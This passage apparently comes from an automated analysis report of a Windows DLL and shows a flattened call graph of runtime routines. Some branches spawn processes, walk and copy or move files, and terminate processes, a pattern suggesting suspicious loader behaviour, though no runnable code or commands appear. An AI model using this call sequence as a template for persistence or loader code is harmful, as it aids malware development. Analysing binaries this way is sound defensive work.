6f9ed4b9 __FrameHandler3::FrameUnwindToState 13165->13166 13167 6f9f189f CallUnexpected EnterCriticalSection 13166->13167 13168 6f9ed4c3 13167->13168 13169 6f9ed4f3 __dosmaperr LeaveCriticalSection 13168->13169 13170 6f9ed4e1 13169->13170 13171 6f9ed5bf 13170->13171 13172 6f9ed5cb __FrameHandler3::FrameUnwindToState 13171->13172 13173 6f9f189f CallUnexpected EnterCriticalSection 13172->13173 13174 6f9ed5d5 13173->13174 13175 6f9ed7a0 __dosmaperr 17 API calls 13174->13175 13176 6f9ed5ed 13175->13176 13177 6f9ed60d __dosmaperr LeaveCriticalSection 13176->13177 13178 6f9ed5fb 13177->13178 13178->13147 13180 6f9ec1d4 __fread_nolock 13179->13180 13185 6f9ec1f9 13180->13185 13186 6f9ec209 13185->13186 13190 6f9ec210 13185->13190 13203 6f9e64a1 GetLastError 13186->13203 13188 6f9ec21e 13191 6f9ec22d mydllmain 13188->13191 13190->13188 13207 6f9ec051 13190->13207 13193 6f9ec1ec 13191->13193 13192 6f9ec245 13192->13191 13194 6f9ec270 13192->13194 13197 6f9e609e 13193->13197 13210 6f9ec2a3 IsProcessorFeaturePresent 13194->13210 13196 6f9ec275 13198 6f9e60aa 13197->13198 13199 6f9e60c1 13198->13199 13214 6f9e64e7 13198->13214 13201 6f9e60d4 13199->13201 13202 6f9e64e7 __fread_nolock 50 API calls 13199->13202 13202->13201 13204 6f9e64ba 13203->13204 13205 6f9eda19 __fread_nolock 17 API calls 13204->13205 13206 6f9e64d2 SetLastError 13205->13206 13206->13190 13208 6f9ec05c GetLastError SetLastError 13207->13208 13209 6f9ec075 13207->13209 13208->13192 13209->13192 13211 6f9ec2af 13210->13211 13212 6f9ec07a CallUnexpected 8 API calls 13211->13212 13213 6f9ec2c4 GetCurrentProcess TerminateProcess 13212->13213 13213->13196 13215 6f9e64fa 13214->13215 13216 6f9e64f1 13214->13216 13215->13199 13217 6f9e64a1 __fread_nolock 19 API calls 13216->13217 13218 6f9e64f6 13217->13218 13218->13215 13219 6f9ed0c1 CallUnexpected 50 API calls 13218->13219 13220 6f9e6503 13219->13220 13221->13080 13222->13064 13224 6f9e35eb 13223->13224 13225 6f9e35e7 13223->13225 13226 6f9e3741 __DllMainCRTStartup@12 4 API calls 13224->13226 13228 6f9e35f8 ___scrt_release_startup_lock 13224->13228 13225->12918 13227 6f9e3661 13226->13227 13228->12918 13235 6f9ed7eb 13229->13235 13232 6f9e4a77 13415 6f9e4aba 13232->13415 13236 6f9ed7f5 13235->13236 13238 6f9e3536 13235->13238 13237 6f9efcb0 __dosmaperr 7 API calls 13236->13237 13239 6f9ed7fc 13237->13239 13238->13232 13239->13238 13240 6f9efcef __dosmaperr 7 API calls 13239->13240 13241 6f9ed80f 13240->13241 13243 6f9ed6b2 13241->13243 13244 6f9ed6cd 13243->13244 13245 6f9ed6bd 13243->13245 13244->13238 13249 6f9ed6d3 13245->13249 13248 6f9ee7c4 ___free_lconv_mon 17 API calls 13248->13244 13250 6f9ed6e8 13249->13250 13251 6f9ed6ee 13249->13251 13252 6f9ee7c4 ___free_lconv_mon 17 API calls 13250->13252 13253 6f9ee7c4 ___free_lconv_mon 17 API calls 13251->13253 13252->13251 13254 6f9ed6fa 13253->13254 13255 6f9ee7c4 ___free_lconv_mon 17 API calls 13254->13255 13256 6f9ed705 13255->13256 13257 6f9ee7c4 ___free_lconv_mon 17 API calls 13256->13257 13258 6f9ed710 13257->13258 13259 6f9ee7c4 ___free_lconv_mon 17 API calls 13258->13259 13260 6f9ed71b 13259->13260 13261 6f9ee7c4 ___free_lconv_mon 17 API calls 13260->13261 13262 6f9ed726 13261->13262 13263 6f9ee7c4 ___free_lconv_mon 17 API calls 13262->13263 13264 6f9ed731 13263->13264 13265 6f9ee7c4 ___free_lconv_mon 17 API calls 13264->13265 13266 6f9ed73c 13265->13266 13267 6f9ee7c4 ___free_lconv_mon 17 API calls 13266->13267 13268 6f9ed747 13267->13268 13269 6f9ee7c4 ___free_lconv_mon 17 API calls 13268->13269 13270 6f9ed755 13269->13270 13275 6f9ed4ff 13270->13275 13276 6f9ed50b __FrameHandler3::FrameUnwindToState 13275->13276 13291 6f9f189f EnterCriticalSection 13276->13291 13278 6f9ed53f 13292 6f9ed55e 13278->13292 13281 6f9ed515 13281->13278 13282 6f9ee7c4 ___free_lconv_mon 17 API calls 13281->13282 13282->13278 13283 6f9ed56a 13284 6f9ed576 __FrameHandler3::FrameUnwindToState 13283->13284 13296 6f9f189f EnterCriticalSection 13284->13296 13286 6f9ed580 13297 6f9ed7a0 13286->13297 13288 6f9ed593 13301 6f9ed5b3 13288->13301 13291->13281 13295 6f9f18e7 LeaveCriticalSection 13292->13295 13294 6f9ed54c 13294->13283 13295->13294 13296->13286 13298 6f9ed7af __dosmaperr 13297->13298 13300 6f9ed7d6 __dosmaperr 13297->13300 13298->13300 13304 6f9f3745 13298->13304 13300->13288 13414 6f9f18e7 LeaveCriticalSection 13301->13414 13303 6f9ed5a1 13303->13248 13311 6f9f375b 13304->13311 13329 6f9f37c5 13304->13329 13306 6f9ee7c4 ___free_lconv_mon 17 API calls 13307 6f9f37e7 13306->13307 13309 6f9ee7c4 ___free_lconv_mon 17 API calls 13307->13309 13308 6f9f378e 13310 6f9f37b0 13308->13310 13316 6f9ee7c4 ___free_lconv_mon 17 API calls 13308->13316 13312 6f9f37fa 13309->13312 13313 6f9ee7c4 ___free_lconv_mon 17 API calls 13310->13313 13311->13308 13314 6f9ee7c4 ___free_lconv_mon 17 API calls 13311->13314 13311->13329 13315 6f9ee7c4 ___free_lconv_mon 17 API calls 13312->13315 13317 6f9f37ba 13313->13317 13319 6f9f3783 13314->13319 13321 6f9f3808 13315->13321 13322 6f9f37a5 13316->13322 13323 6f9ee7c4 ___free_lconv_mon 17 API calls 13317->13323 13318 6f9f3881 13324 6f9ee7c4 ___free_lconv_mon 17 API calls 13318->13324 13332 6f9f3a62 13319->13332 13320 6f9f3821 13320->13318 13326 6f9ee7c4 17 API calls ___free_lconv_mon 13320->13326 13327 6f9ee7c4 ___free_lconv_mon 17 API calls 13321->13327 13360 6f9f3b60 13322->13360 13323->13329 13330 6f9f3887 13324->13330 13326->13320 13331 6f9f3813 13327->13331 13329->13306 13329->13331 13330->13300 13372 6f9f38b6 13331->13372 13333 6f9f3a73 13332->13333 13359 6f9f3b5c 13332->13359 13334 6f9ee7c4 ___free_lconv_mon 17 API calls 13333->13334 13335 6f9f3a84 13333->13335 13334->13335 13336 6f9ee7c4 ___free_lconv_mon 17 API calls 13335->13336 13338 6f9f3a96 13335->13338 13336->13338 13337 6f9f3aa8 13340 6f9f3aba 13337->13340 13341 6f9ee7c4 ___free_lconv_mon 17 API calls 13337->13341 13338->13337 13339 6f9ee7c4 ___free_lconv_mon 17 API calls 13338->13339 13339->13337 13342 6f9f3acc 13340->13342 13343 6f9ee7c4 ___free_lconv_mon 17 API calls 13340->13343 13341->13340 13344 6f9f3ade 13342->13344 13345 6f9ee7c4 ___free_lconv_mon 17 API calls 13342->13345 13343->13342 13346 6f9f3af0 13344->13346 13347 6f9ee7c4 ___free_lconv_mon 17 API calls 13344->13347 13345->13344 13348 6f9f3b02 13346->13348 13349 6f9ee7c4 ___free_lconv_mon 17 API calls 13346->13349 13347->13346 13350 6f9f3b14 13348->13350 13351 6f9ee7c4 ___free_lconv_mon 17 API calls 13348->13351 13349->13348 13352 6f9f3b26 13350->13352 13353 6f9ee7c4 ___free_lconv_mon 17 API calls 13350->13353 13351->13350 13354 6f9f3b38 13352->13354 13355 6f9ee7c4 ___free_lconv_mon 17 API calls 13352->13355 13353->13352 13356 6f9f3b4a 13354->13356 13357 6f9ee7c4 ___free_lconv_mon 17 API calls 13354->13357 13355->13354 13358 6f9ee7c4 ___free_lconv_mon 17 API calls 13356->13358 13356->13359 13357->13356 13358->13359 13359->13308 13361 6f9f3b6d 13360->13361 13371 6f9f3bc5 13360->13371 13362 6f9f3b7d 13361->13362 13364 6f9ee7c4 ___free_lconv_mon 17 API calls 13361->13364 13363 6f9f3b8f 13362->13363 13365 6f9ee7c4 ___free_lconv_mon 17 API calls 13362->13365 13366 6f9ee7c4 ___free_lconv_mon 17 API calls 13363->13366 13367 6f9f3ba1 13363->13367 13364->13362 13365->13363 13366->13367 13368 6f9f3bb3 13367->13368 13369 6f9ee7c4 ___free_lconv_mon 17 API calls 13367->13369 13370 6f9ee7c4 ___free_lconv_mon 17 API calls 13368->13370 13368->13371 13369->13368 13370->13371 13371->13310 13373 6f9f38c3 13372->13373 13377 6f9f38e2 13372->13377 13373->13377 13378 6f9f3bee 13373->13378 13376 6f9ee7c4 ___free_lconv_mon 17 API calls 13376->13377 13377->13320 13379 6f9f38dc 13378->13379 13380 6f9f3bff 13378->13380 13379->13376 13381 6f9f3bc9 __dosmaperr 17 API calls 13380->13381 13382 6f9f3c07 13381->13382 13383 6f9f3bc9 __dosmaperr 17 API calls 13382->13383 13384 6f9f3c12 13383->13384 13385 6f9f3bc9 __dosmaperr 17 API calls 13384->13385 13386 6f9f3c1d 13385->13386 13387 6f9f3bc9 __dosmaperr 17 API calls 13386->13387 13388 6f9f3c28 13387->13388 13389 6f9f3bc9 __dosmaperr 17 API calls 13388->13389 13390 6f9f3c36 13389->13390 13391 6f9ee7c4 ___free_lconv_mon 17 API calls 13390->13391 13392 6f9f3c41 13391->13392 13393 6f9ee7c4 ___free_lconv_mon 17 API calls 13392->13393 13394 6f9f3c4c 13393->13394 13395 6f9ee7c4 ___free_lconv_mon 17 API calls 13394->13395 13396 6f9f3c57 13395->13396 13397 6f9f3bc9 __dosmaperr 17 API calls 13396->13397 13398 6f9f3c65 13397->13398 13399 6f9f3bc9 __dosmaperr 17 API calls 13398->13399 13400 6f9f3c73 13399->13400 13401 6f9f3bc9 __dosmaperr 17 API calls 13400->13401 13402 6f9f3c84 13401->13402 13403 6f9f3bc9 __dosmaperr 17 API calls 13402->13403 13404 6f9f3c92 13403->13404 13405 6f9f3bc9 __dosmaperr 17 API calls 13404->13405 13406 6f9f3ca0 13405->13406 13407 6f9ee7c4 ___free_lconv_mon 17 API calls 13406->13407 13408 6f9f3cab 13407->13408 13409 6f9ee7c4 ___free_lconv_mon 17 API calls 13408->13409 13410 6f9f3cb6 13409->13410 13411 6f9ee7c4 ___free_lconv_mon 17 API calls 13410->13411 13412 6f9f3cc1 13411->13412 13413 6f9ee7c4 ___free_lconv_mon 17 API calls 13412->13413 13413->13379 13414->13303 13416 6f9e353b 13415->13416 13417 6f9e4ac4 13415->13417 13416->12840 13423 6f9e5cc3 13417->13423 13420 6f9e5cfe ___vcrt_FlsSetValue 7 API calls 13421 6f9e4ada 13420->13421 13429 6f9e4a9e 13421->13429 13424 6f9e5b62 ___vcrt_FlsGetValue 5 API calls 13423->13424 13425 6f9e5cdd 13424->13425 13426 6f9e5ce9 mydllmain 13425->13426 13427 6f9e5cf5 TlsGetValue 13425->13427 13428 6f9e4acb 13426->13428 13427->13428 13428->13420 13430 6f9e4aa8 13429->13430 13432 6f9e4ab5 13429->13432 13430->13432 13433 6f9eb928 13430->13433 13432->13416 13434 6f9ee7c4 ___free_lconv_mon 17 API calls 13433->13434 13435 6f9eb940 13434->13435 13435->13432 13442 6f9e4af3 13436->13442 13438 6f9e3517 13438->12875 13439 6f9ed030 13438->13439 13440 6f9ed968 __dosmaperr 17 API calls 13439->13440 13441 6f9e3523 13440->13441 13441->12873 13441->12874 13443 6f9e4aff GetLastError 13442->13443 13444 6f9e4afc 13442->13444 13445 6f9e5cc3 ___vcrt_FlsGetValue 7 API calls 13443->13445 13444->13438 13446 6f9e4b14 13445->13446 13447 6f9e4b33 13446->13447 13448 6f9e4b79 SetLastError 13446->13448 13449 6f9e5cfe ___vcrt_FlsSetValue 7 API calls 13446->13449 13447->13448 13448->13438 13450 6f9e4b2d CallUnexpected 13449->13450 13450->13447 13451 6f9e4b55 13450->13451 13452 6f9e5cfe ___vcrt_FlsSetValue 7 API calls 13450->13452 13453 6f9e5cfe ___vcrt_FlsSetValue 7 API calls 13451->13453 13454 6f9e4b69 13451->13454 13452->13451 13453->13454 13455 6f9eb928 ___vcrt_freefls@4 17 API calls 13454->13455 13455->13447 13457 6f9e3577 ___scrt_release_startup_lock 13456->13457 13458 6f9e357b 13457->13458 13459 6f9e3587 __DllMainCRTStartup@12 13457->13459 13486 6f9ece9a 13458->13486 13462 6f9e3594 13459->13462 13490 6f9ec683 13459->13490 13461 6f9e3585 13461->12883 13462->12883 13570 6f9e4a2a InterlockedFlushSList 13465->13570 13468 6f9e388a 13469 6f9e389a 13468->13469 13471 6f9e38b2 13468->13471 13470 6f9e38a1 mydllmain 13469->13470 13469->13471 13470->13469 13471->12888 13473 6f9e371f 13472->13473 13474 6f9e3079 13473->13474 13574 6f9ed043 13473->13574 13478 6f9e30b5 13474->13478 13476 6f9e372d 13477 6f9e4a7f ___scrt_uninitialize_crt 8 API calls 13476->13477 13477->13474 13678 6f9e3595 13478->13678 13482 6f9e100d 13481->13482 13483 6f9e1007 13481->13483 13696 6f9e2959 13482->13696 13483->12897 13483->12900 13487 6f9ecea6 __EH_prolog3 13486->13487 13501 6f9ecd65 13487->13501 13489 6f9ececd __DllMainCRTStartup@12 13489->13461 13491 6f9ec6b0 13490->13491 13499 6f9ec6c1 13490->13499 13520 6f9ec74b GetModuleHandleW 13491->13520 13495 6f9ec6ff 13495->12883 13528 6f9ec54e 13499->13528 13502 6f9ecd71 __FrameHandler3::FrameUnwindToState 13501->13502 13509 6f9f189f EnterCriticalSection 13502->13509 13504 6f9ecd7f 13510 6f9ecdc0 13504->13510 13509->13504 13511 6f9ecddf 13510->13511 13514 6f9ecd8c 13510->13514 13512 6f9ece6d 13511->13512 13513 6f9ece20 mydllmain 13511->13513 13511->13514 13512->13514 13515 6f9ee7c4 ___free_lconv_mon 17 API calls 13512->13515 13513->13511 13516 6f9ecdb4 13514->13516 13515->13514 13519 6f9f18e7 LeaveCriticalSection 13516->13519 13518 6f9ecd9d 13518->13489 13519->13518 13521 6f9ec6b5 13520->13521 13521->13499 13522 6f9ec7a6 GetModuleHandleExW 13521->13522 13523 6f9ec806 13522->13523 13524 6f9ec7e5 GetProcAddress 13522->13524 13526 6f9ec80c FreeLibrary 13523->13526 13527 6f9ec815 13523->13527 13524->13523 13525 6f9ec7f9 mydllmain 13524->13525 13525->13523 13526->13527 13527->13499 13529 6f9ec55a __FrameHandler3::FrameUnwindToState 13528->13529 13543 6f9f189f EnterCriticalSection 13529->13543 13531 6f9ec564 13544 6f9ec59b 13531->13544 13536 6f9ec71a 13558 6f9ec78d 13536->13558 13538 6f9ec724 13539 6f9ec738 13538->13539 13540 6f9ec728 GetCurrentProcess TerminateProcess 13538->13540 13541 6f9ec7a6 CallUnexpected 4 API calls 13539->13541 13540->13539 13542 6f9ec740 ExitProcess 13541->13542 13543->13531 13546 6f9ec5a7 __FrameHandler3::FrameUnwindToState CallUnexpected 13544->13546 13545 6f9ec571 13554 6f9ec58f 13545->13554 13546->13545 13547 6f9ec5f5 13546->13547 13551 6f9ec5e5 mydllmain 13546->13551 13548 6f9ec60b 13547->13548 13552 6f9ece9a __DllMainCRTStartup@12 18 API calls 13547->13552 13549 6f9ec628 13548->13549 13553 6f9ec38f CallUnexpected mydllmain 13548->13553 13550 6f9ec38f CallUnexpected mydllmain 13549->13550 13550->13545 13551->13547 13552->13548 13553->13549 13557 6f9f18e7 LeaveCriticalSection 13554->13557 13556 6f9ec57d 13556->13495 13556->13536 13557->13556 13561 6f9f1923 13558->13561 13560 6f9ec792 CallUnexpected 13560->13538 13562 6f9f1932 CallUnexpected 13561->13562 13563 6f9f193f 13562->13563 13565 6f9efbd3 13562->13565 13563->13560 13566 6f9efb4e __dosmaperr 5 API calls 13565->13566 13567 6f9efbef 13566->13567 13568 6f9efbf8 mydllmain 13567->13568 13569 6f9efc07 13567->13569 13568->13569 13569->13563 13571 6f9e4a3a 13570->13571 13573 6f9e305a 13570->13573 13572 6f9eb928 ___vcrt_freefls@4 17 API calls 13571->13572 13571->13573 13572->13571 13573->13468 13575 6f9ed060 13574->13575 13578 6f9ed04e 13574->13578 13584 6f9f2ef8 13575->13584 13577 6f9ed05c 13577->13476 13578->13577 13581 6f9f01a6 13578->13581 13588 6f9f0037 13581->13588 13585 6f9f2f06 13584->13585 13587 6f9ed06f 13584->13587 13586 6f9f2f0e mydllmain 13585->13586 13585->13587 13586->13585 13587->13476 13591 6f9eff8b 13588->13591 13592 6f9eff97 __FrameHandler3::FrameUnwindToState 13591->13592 13599 6f9f189f EnterCriticalSection 13592->13599 13594 6f9f000d 13608 6f9f002b 13594->13608 13597 6f9effa1 ___scrt_uninitialize_crt 13597->13594 13600 6f9efeff 13597->13600 13599->13597 13601 6f9eff0b __FrameHandler3::FrameUnwindToState 13600->13601 13611 6f9eafcd EnterCriticalSection 13601->13611 13603 6f9eff15 ___scrt_uninitialize_crt 13604 6f9eff4e 13603->13604 13612 6f9f0141 13603->13612 13625 6f9eff7f 13604->13625 13677 6f9f18e7 LeaveCriticalSection 13608->13677 13610 6f9f0019 13610->13577 13611->13603 13613 6f9f0156 __fread_nolock 13612->13613 13614 6f9f015d 13613->13614 13615 6f9f0168 13613->13615 13616 6f9f0037 ___scrt_uninitialize_crt 79 API calls 13614->13616 13628 6f9f00d8 13615->13628 13619 6f9f0163 13616->13619 13620 6f9e609e __fread_nolock 50 API calls 13619->13620 13622 6f9f01a0 13620->13622 13622->13604 13623 6f9f0189 13641 6f9f5de5 13623->13641 13676 6f9eafe1 LeaveCriticalSection 13625->13676 13627 6f9eff6d 13627->13597 13629 6f9f0118 13628->13629 13630 6f9f00f1 13628->13630 13629->13619 13634 6f9ed222 13629->13634 13630->13629 13631 6f9ed222 __fread_nolock 50 API calls 13630->13631 13632 6f9f010d 13631->13632 13652 6f9f113f 13632->13652 13635 6f9ed22e 13634->13635 13636 6f9ed243 13634->13636 13637 6f9ee7b1 __dosmaperr 17 API calls 13635->13637 13636->13623 13638 6f9ed233 13637->13638 13639 6f9ec276 __fread_nolock 50 API calls 13638->13639 13640 6f9ed23e 13639->13640 13640->13623 13642 6f9f5df6 13641->13642 13645 6f9f5e03 13641->13645 13643 6f9ee7b1 __dosmaperr 17 API calls 13642->13643 13651 6f9f5dfb 13643->13651 13644 6f9f5e4c 13646 6f9ee7b1 __dosmaperr 17 API calls 13644->13646 13645->13644 13647 6f9f5e2a 13645->13647 13648 6f9f5e51 13646->13648 13663 6f9f5d43 13647->13663 13650 6f9ec276 __fread_nolock 50 API calls 13648->13650 13650->13651 13651->13619 13654 6f9f114b __FrameHandler3::FrameUnwindToState 13652->13654 13653 6f9f118c 13655 6f9ec1f9 __fread_nolock 33 API calls 13653->13655 13654->13653 13656 6f9f11d2 13654->13656 13662 6f9f1153 13654->13662 13655->13662 13657 6f9f33e2 __wsopen_s EnterCriticalSection 13656->13657 13658 6f9f11d8 13657->13658 13659 6f9f11f6 13658->13659 13660 6f9f1250 __wsopen_s 73 API calls 13658->13660 13661 6f9f1248 __wsopen_s LeaveCriticalSection 13659->13661 13660->13659 13661->13662 13662->13629 13664 6f9f5d4f __FrameHandler3::FrameUnwindToState 13663->13664 13665 6f9f33e2 __wsopen_s EnterCriticalSection 13664->13665 13666 6f9f5d5e 13665->13666 13667 6f9f365e __wsopen_s 50 API calls 13666->13667 13675 6f9f5da3 13666->13675 13669 6f9f5d8a FlushFileBuffers 13667->13669 13668 6f9ee7b1 __dosmaperr 17 API calls 13670 6f9f5daa 13668->13670 13669->13670 13671 6f9f5d96 GetLastError 13669->13671 13673 6f9f5dd9 ___scrt_uninitialize_crt LeaveCriticalSection 13670->13673 13672 6f9ee79e __dosmaperr 17 API calls 13671->13672 13672->13675 13674 6f9f5dc2 13673->13674 13674->13651 13675->13668 13676->13627 13677->13610 13683 6f9ed073 13678->13683 13681 6f9e4bb8 ___vcrt_uninitialize_ptd 7 API calls 13682 6f9e30ba 13681->13682 13682->12877 13686 6f9edae8 13683->13686 13687 6f9e359c 13686->13687 13688 6f9edaf2 13686->13688 13687->13681 13690 6f9efc71 13688->13690 13691 6f9efb4e __dosmaperr 5 API calls 13690->13691 13692 6f9efc8d 13691->13692 13693 6f9efca8 TlsFree 13692->13693 13694 6f9efc96 mydllmain 13692->13694 13695 6f9efca3 13694->13695 13695->13687 13697 6f9e2983 __fread_nolock 13696->13697 13730 6f9e10ab 13697->13730 13699 6f9e299b __DllMainCRTStartup@12 _strlen 13733 6f9e1024 13699->13733 13702 6f9eb928 ___vcrt_freefls@4 17 API calls 13703 6f9e29e4 GetEnvironmentVariableW 13702->13703 13737 6f9e1274 13703->13737 13706 6f9e10ab __DllMainCRTStartup@12 59 API calls 13707 6f9e2a14 __DllMainCRTStartup@12 _strlen 13706->13707 13708 6f9e1024 __DllMainCRTStartup@12 58 API calls 13707->13708 13709 6f9e2a54 13708->13709 13710 6f9eb928 ___vcrt_freefls@4 17 API calls 13709->13710 13711 6f9e2a5a 13710->13711 13757 6f9e140f 13711->13757 13714 6f9e10ab __DllMainCRTStartup@12 59 API calls 13715 6f9e2a92 __DllMainCRTStartup@12 _strlen 13714->13715 13716 6f9e1024 __DllMainCRTStartup@12 58 API calls 13715->13716 13717 6f9e2adc 13716->13717 13718 6f9eb928 ___vcrt_freefls@4 17 API calls 13717->13718 13719 6f9e2ae2 13718->13719 13720 6f9e10ab __DllMainCRTStartup@12 59 API calls 13719->13720 13721 6f9e2af5 __DllMainCRTStartup@12 _strlen 13720->13721 13722 6f9e1024 __DllMainCRTStartup@12 58 API calls 13721->13722 13723 6f9e2b3d 13722->13723 13724 6f9eb928 ___vcrt_freefls@4 17 API calls 13723->13724 13725 6f9e2b43 13724->13725 13779 6f9e1629 13725->13779 13729 6f9e1012 ExitProcess 13818 6f9e107d 13730->13818 13734 6f9e103d __DllMainCRTStartup@12 13733->13734 13941 6f9eaabc 13734->13941 14122 6f9e44d0 13737->14122 13740 6f9e10ab __DllMainCRTStartup@12 59 API calls 13741 6f9e12c6 __DllMainCRTStartup@12 _strlen 13740->13741 13742 6f9e1308 GetProcAddress 13741->13742 13743 6f9eb928 ___vcrt_freefls@4 17 API calls 13742->13743 13744 6f9e1320 13743->13744 13745 6f9e10ab __DllMainCRTStartup@12 59 API calls 13744->13745 13746 6f9e1332 __DllMainCRTStartup@12 _strlen 13745->13746 13747 6f9e1374 GetProcAddress 13746->13747 13748 6f9eb928 ___vcrt_freefls@4 17 API calls 13747->13748 13749 6f9e138b 13748->13749 13750 6f9e10ab __DllMainCRTStartup@12 59 API calls 13749->13750 13751 6f9e139d __DllMainCRTStartup@12 _strlen 13750->13751 13752 6f9e13dd GetProcAddress 13751->13752 13753 6f9eb928 ___vcrt_freefls@4 17 API calls 13752->13753 13754 6f9e13f4 13753->13754 13755 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 13754->13755 13756 6f9e1407 13755->13756 13756->13706 13758 6f9e1439 __fread_nolock 13757->13758 13759 6f9e10ab __DllMainCRTStartup@12 59 API calls 13758->13759 13760 6f9e1485 __DllMainCRTStartup@12 _strlen 13759->13760 13761 6f9e1024 __DllMainCRTStartup@12 58 API calls 13760->13761 13762 6f9e14cd 13761->13762 13763 6f9eb928 ___vcrt_freefls@4 17 API calls 13762->13763 13764 6f9e14d6 13763->13764 13765 6f9e1024 __DllMainCRTStartup@12 58 API calls 13764->13765 13766 6f9e14f7 CreateProcessW 13765->13766 13767 6f9e160e 13766->13767 13770 6f9e1525 __fread_nolock 13766->13770 13768 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 13767->13768 13769 6f9e1622 Sleep Sleep 13768->13769 13769->13714 13771 6f9e10ab __DllMainCRTStartup@12 59 API calls 13770->13771 13772 6f9e156b __DllMainCRTStartup@12 _strlen 13771->13772 13773 6f9e1024 __DllMainCRTStartup@12 58 API calls 13772->13773 13774 6f9e15b3 13773->13774 13775 6f9eb928 ___vcrt_freefls@4 17 API calls 13774->13775 13776 6f9e15b9 13775->13776 13777 6f9e1024 __DllMainCRTStartup@12 58 API calls 13776->13777 13778 6f9e15e3 Sleep CreateProcessW 13777->13778 13778->13767 13780 6f9e1024 __DllMainCRTStartup@12 58 API calls 13779->13780 13781 6f9e16ca FindFirstFileW 13780->13781 13789 6f9e16f2 13781->13789 13782 6f9e1a0d 14124 6f9e2469 13782->14124 13785 6f9e19e8 FindNextFileW 13785->13789 13786 6f9e1024 __DllMainCRTStartup@12 58 API calls 13786->13789 13787 6f9e2469 __DllMainCRTStartup@12 50 API calls 13788 6f9e1a23 13787->13788 13790 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 13788->13790 13789->13782 13789->13785 13789->13786 13791 6f9e1629 __DllMainCRTStartup@12 126 API calls 13789->13791 13798 6f9e1794 __DllMainCRTStartup@12 _strlen 13789->13798 13792 6f9e1a40 13790->13792 13791->13789 13811 6f9e2e45 13792->13811 13793 6f9e1024 __DllMainCRTStartup@12 58 API calls 13795 6f9e19af TerminateProcess CloseHandle CloseHandle 13793->13795 13794 6f9e10ab __DllMainCRTStartup@12 59 API calls 13794->13798 14211 6f9e1a48 13795->14211 13797 6f9e1024 __DllMainCRTStartup@12 58 API calls 13797->13798 13798->13793 13798->13794 13798->13797 13799 6f9eb928 ___vcrt_freefls@4 17 API calls 13798->13799 13800 6f9e17f2 ExpandEnvironmentStringsW 13799->13800 13801 6f9e1024 __DllMainCRTStartup@12 58 API calls 13800->13801 13806 6f9e1828 __fread_nolock __DllMainCRTStartup@12 13801->13806 13802 6f9e2469 50 API calls __DllMainCRTStartup@12 13802->13806 13803 6f9e23bb 52 API calls __DllMainCRTStartup@12 13803->13806 13806->13802 13806->13803 13807 6f9e1024 __DllMainCRTStartup@12 58 API calls 13806->13807 14128 6f9e23ec 13806->14128 14136 6f9e1cfa CoInitialize CoCreateInstance 13806->14136 13808 6f9e190a CopyFileW Sleep 13807->13808 14206 6f9eb8fb MoveFileExW 13808->14206 13810 6f9e1940 TerminateProcess CloseHandle CloseHandle 13810->13789 13812 6f9e2e4e IsProcessorFeaturePresent 13811->13812 13813 6f9e2e4d 13811->13813 13815 6f9e3289 13812->13815 13813->13729 14952 6f9e324c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13815->14952 13817 6f9e336c 13817->13729 13819 6f9e1094 __DllMainCRTStartup@12 13818->13819 13822 6f9eaa7b 13819->13822 13823 6f9eaa8f __fread_nolock 13822->13823 13828 6f9e6891 13823->13828 13826 6f9e609e __fread_nolock 50 API calls 13827 6f9e109e 13826->13827 13827->13699 13829 6f9e689d 13828->13829 13830 6f9e68c0 13828->13830 13831 6f9ec1f9 __fread_nolock 33 API calls 13829->13831 13834 6f9e68e7 13830->13834 13836 6f9e659a 13830->13836 13835 6f9e68b8 13831->13835 13833 6f9ec1f9 __fread_nolock 33 API calls 13833->13835 13834->13833 13834->13835 13835->13826 13837 6f9e65c6 13836->13837 13839 6f9e65e9 13836->13839 13838 6f9ec1f9 __fread_nolock 33 API calls 13837->13838 13840 6f9e65de 13838->13840 13839->13837 13842 6f9e65f1 __DllMainCRTStartup@12 13839->13842 13841 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 13840->13841 13843 6f9e670c 13841->13843 13847 6f9e8a6b 13842->13847 13843->13834 13864 6f9ea71e 13847->13864 13849 6f9e6672 13861 6f9e847f 13849->13861 13850 6f9ec1f9 __fread_nolock 33 API calls 13850->13849 13851 6f9e8a90 13851->13850 13856 6f9e8a85 __DllMainCRTStartup@12 13856->13849 13856->13851 13857 6f9e8b94 13856->13857 13868 6f9ea670 13856->13868 13875 6f9e86c9 13856->13875 13878 6f9e90e8 13856->13878 13912 6f9e970d 13856->13912 13858 6f9ec1f9 __fread_nolock 33 API calls 13857->13858 13859 6f9e8bae 13858->13859 13860 6f9ec1f9 __fread_nolock 33 API calls 13859->13860 13860->13849 13862 6f9ee7c4 ___free_lconv_mon 17 API calls 13861->13862 13863 6f9e848f 13862->13863 13863->13840 13865 6f9ea742 13864->13865 13866 6f9ea729 13864->13866 13865->13856 13867 6f9ec1f9 __fread_nolock 33 API calls 13866->13867 13867->13865 13869 6f9e64e7 __fread_nolock 50 API calls 13868->13869 13870 6f9ea680 13869->13870 13871 6f9ee879 __DllMainCRTStartup@12 50 API calls 13870->13871 13872 6f9ea69d 13871->13872 13873 6f9ee8d7 __DllMainCRTStartup@12 50 API calls 13872->13873 13874 6f9ea6aa 13873->13874 13874->13856 13876 6f9e6bcc __DllMainCRTStartup@12 50 API calls 13875->13876 13877 6f9e8704 13876->13877 13877->13856 13879 6f9e90ef 13878->13879 13880 6f9e9106 13878->13880 13882 6f9e9792 13879->13882 13883 6f9e9732 13879->13883 13905 6f9e9145 13879->13905 13881 6f9ec1f9 __fread_nolock 33 API calls 13880->13881 13880->13905 13886 6f9e913a 13881->13886 13884 6f9e97cb 13882->13884 13885 6f9e9797 13882->13885 13887 6f9e97b8 13883->13887 13888 6f9e9738 13883->13888 13889 6f9e97e8 13884->13889 13892 6f9e97d0 13884->13892 13890 6f9e97c4 13885->13890 13895 6f9e9799 13885->13895 13886->13856 13897 6f9e76eb __DllMainCRTStartup@12 34 API calls 13887->13897 13896 6f9e973d 13888->13896 13899 6f9e9789 13888->13899 13893 6f9ea4ae __DllMainCRTStartup@12 34 API calls 13889->13893 13891 6f9ea474 __DllMainCRTStartup@12 34 API calls 13890->13891 13910 6f9e9763 __DllMainCRTStartup@12 13891->13910 13892->13887 13892->13899 13892->13910 13893->13910 13894 